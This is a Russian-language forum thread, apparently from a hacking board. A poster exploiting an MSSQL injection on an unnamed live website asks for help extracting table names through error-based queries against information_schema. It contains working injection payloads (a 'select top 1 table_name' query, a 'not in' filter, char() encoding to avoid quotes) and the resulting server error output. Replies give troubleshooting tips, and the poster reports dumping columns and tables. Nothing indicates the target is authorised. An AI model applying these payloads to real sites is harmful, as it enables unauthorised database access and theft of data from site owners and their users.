Хай.
Короче есть проблема которую нужно решить ;)
Существует сайт.
На сайте инъекция (MSSQL)
При запросе такого вида:
===============================
-1+select+top+1+table_name+from+information_schema. tables
===============================

В ошибке выводится имя таблицы:
===============================
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Products' to a column of data type int
===============================

Одна таблица есть, пробую вытащить имя второй таблицы таким запросом:
===============================
select+top+1+table_name+from+information_schema.ta bles+where+table_name+not+in('Products')
===============================

На что сервак мне отвечает:
===============================
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 6: Incorrect syntax near 'Products'
===============================

На многих серваках этот приём срабатывал.....
Ошибка синтаксиса, хмм..
В чем же она заключается???

после in пробел есть?

угу

мб забыл -- поставить?

нет, комент там и не нужен все ок
Может есть какиенить альтернативы по перебору колонок?

попробуй скобки убрать, т.е. просто table_name+not+in+'Products'

Спасибо попробую

Попробовал, вот что мне вылезло:
============================
Incorrect syntax near ''
============================
:(

Решение - кинь ссылку, вторую теу уже создаешь )

хм интересено, если 'Products' перевести в вид "char(....)"
типа :

================================
select+top+1+table_name+from+information_schema.ta bles+where+table_name+not+in(char(....))
================================

я те аналог в предыдушей теме приводил.

']я те аналог в предыдушей теме приводил.

В том что ты привел используются кавычки, на которые соответственно серв ругается.........

Ну раз свежих идей больше нету, то придется самому копать......

Колонки успешно вытянул методом с ordinal_position
А для вытягивания имён таблиц что юзать?

Таблицы получены.